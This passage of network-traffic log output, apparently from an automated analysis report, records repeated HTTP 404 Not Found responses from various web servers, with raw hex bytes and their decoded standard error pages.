                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:09:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:09:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:09:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-244.ec2.internalX-Request-Id: 469e6cbe-2600-49f5-8027-68350022db59Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:26 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:24 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-244.ec2.internalX-Request-Id: 1d410ad4-3f68-47e2-941c-31909849a401Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:26 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:26 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:27 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:27 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:27 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:27 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:27 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:27 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 